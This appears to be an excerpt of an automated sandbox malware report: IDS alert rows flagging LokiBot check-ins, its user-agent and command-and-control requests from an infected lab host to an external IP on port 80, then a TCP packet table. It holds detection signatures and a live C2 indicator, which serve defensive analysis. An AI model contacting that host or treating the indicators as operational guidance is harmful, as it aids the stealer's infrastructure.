2025-01-11T01:43:51.718554+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:51.872833+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:51.872833+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:51.872833+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:52.590087+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:52.590087+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:53.011219+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.011219+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.011219+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.748109+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.748109+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.904054+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:53.904054+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:53.904054+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:54.614974+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:54.614974+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:54.763804+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:54.763804+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:54.763804+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:55.488808+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:55.488808+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:55.926731+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:55.926731+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:55.926731+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:56.636237+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:56.636237+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:56.799040+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:56.799040+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:56.799040+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:57.548619+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:57.548619+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:57.706794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:57.706794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:57.706794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:58.432809+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:58.432809+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:58.606872+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:58.606872+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:58.606872+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:59.294217+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:59.294217+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:59.461313+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:43:59.461313+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:43:59.461313+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:00.168919+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:00.168919+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:00.327731+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:00.327731+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:00.327731+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.029999+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.029999+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.206037+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:01.206037+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:01.206037+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:01.911205+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:01.911205+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:02.066708+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:02.066708+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:02.066708+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:02.788148+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:02.788148+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:03.052322+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.052322+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.052322+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.775125+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.775125+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.938794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:03.938794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:03.938794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:04.664084+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:04.664084+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:04.874883+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:04.874883+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:04.874883+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:05.575862+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:05.575862+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:05.900134+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:05.900134+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:05.900134+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:06.645085+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:06.645085+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:06.794404+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:06.794404+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:06.794404+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:07.690650+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:07.690650+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:07.842580+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:07.842580+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:07.842580+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:08.542955+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:08.542955+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:08.809214+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:08.809214+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:08.809214+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:09.524805+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:09.524805+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:09.691470+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:09.691470+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:09.691470+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:10.390018+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:10.390018+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:10.558794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:10.558794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:10.558794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:11.267558+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:11.267558+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:11.428450+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:11.428450+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:11.428450+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:12.275424+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:12.275424+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:12.445729+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:12.445729+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:12.445729+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:13.186096+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:13.186096+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:13.353273+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:13.353273+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:13.353273+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.053421+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.053421+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.206617+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:14.206617+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:14.206617+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:14.935173+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:14.935173+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:15.088828+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:15.088828+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:15.088828+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:15.838515+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:15.838515+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:16.015685+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.015685+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.015685+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.721393+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.721393+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.870270+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:16.870270+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:16.870270+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:17.604119+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:17.604119+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:17.776454+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:17.776454+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:17.776454+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:18.481641+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:18.481641+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:18.905117+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:18.905117+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:18.905117+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:19.611694+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:19.611694+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:19.764965+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:19.764965+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:19.764965+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:20.466096+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:20.466096+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:20.625881+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:20.625881+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:20.625881+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:21.591884+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:21.591884+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:21.737700+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:21.737700+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:21.737700+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:22.440616+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:22.440616+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:22.607373+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:22.607373+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:22.607373+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:23.341846+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:23.341846+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:23.517156+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:23.517156+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:23.517156+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:24.227497+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:24.227497+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:24.362511+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:24.362511+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:24.362511+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.071196+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.071196+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.207598+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51587	94.156.177.41	80	TCP
2025-01-11T01:44:25.207598+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51587	94.156.177.41	80	TCP
2025-01-11T01:44:25.207598+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51587	94.156.177.41	80	TCP
2025-01-11T01:44:25.895893+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51587	94.156.177.41	80	TCP
2025-01-11T01:44:25.895893+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51587	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:42:20.804887056 CET	49704	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:20.809968948 CET	80	49704	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:20.810062885 CET	49704	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:20.812382936 CET	49704	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:20.817229033 CET	80	49704	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:20.817287922 CET	49704	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:20.822156906 CET	80	49704	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:21.548294067 CET	80	49704	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:21.548448086 CET	80	49704	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:21.548499107 CET	49704	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:21.551175117 CET	49704	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:21.556377888 CET	80	49704	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:22.225563049 CET	49705	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:22.230669975 CET	80	49705	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:22.230762005 CET	49705	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:22.233244896 CET	49705	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:22.238142014 CET	80	49705	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:22.238847971 CET	49705	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:22.250500917 CET	80	49705	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:22.950077057 CET	80	49705	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:22.950140953 CET	80	49705	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:22.950192928 CET	49705	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:22.950231075 CET	49705	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:22.955182076 CET	80	49705	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:23.027854919 CET	49706	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:23.032946110 CET	80	49706	94.156.177.41	192.168.2.8
